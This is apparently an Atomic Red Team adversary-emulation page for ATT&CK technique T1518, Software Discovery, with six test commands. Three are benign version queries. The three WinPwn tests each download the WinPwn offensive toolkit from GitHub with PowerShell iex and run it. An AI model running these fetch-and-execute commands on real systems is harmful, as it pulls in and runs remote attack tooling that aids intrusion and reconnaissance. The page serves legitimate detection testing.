T1518
Software Discovery
Description from ATT&CK
Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to Exploitation for Privilege Escalation.
Atomic Tests
Atomic Test #1 - Find and Display Internet Explorer Browser Version
Query the registry to determine the version of internet explorer installed on the system. Upon execution, version information about internet explorer will be displayed.
Supported Platforms: windows
auto_generated_guid: 68981660-6670-47ee-a5fa-7e74806420a4
Inputs:
None
Attack Commands: Run with command_prompt!
1
2
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion
Atomic Test #2 - Applications Installed
Query the registry to determine software and versions installed on the system. Upon execution a table of software name and version information will be displayed.
Supported Platforms: windows
auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
Atomic Test #3 - Find and Display Safari Browser Version
Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
Supported Platforms: macos
auto_generated_guid: 103d6533-fd2a-4d08-976a-4a598565280f
Inputs:
None
Attack Commands: Run with sh!
1
2
3
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
Atomic Test #4 - WinPwn - Dotnetsearch
Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn
Supported Platforms: windows
auto_generated_guid: 7e79a1b6-519e-433c-ad55-3ff293667101
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Dotnetsearch -noninteractive -consoleoutput
Atomic Test #5 - WinPwn - DotNet
Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.
Supported Platforms: windows
auto_generated_guid: 10ba02d0-ab76-4f80-940d-451633f24c5b
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
dotnet -consoleoutput -noninteractive
Atomic Test #6 - WinPwn - powerSQL
Start PowerUpSQL Checks using powerSQL function of WinPwn
Supported Platforms: windows
auto_generated_guid: 0bb64470-582a-4155-bde2-d6003a95ed34
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powerSQL -noninteractive -consoleoutput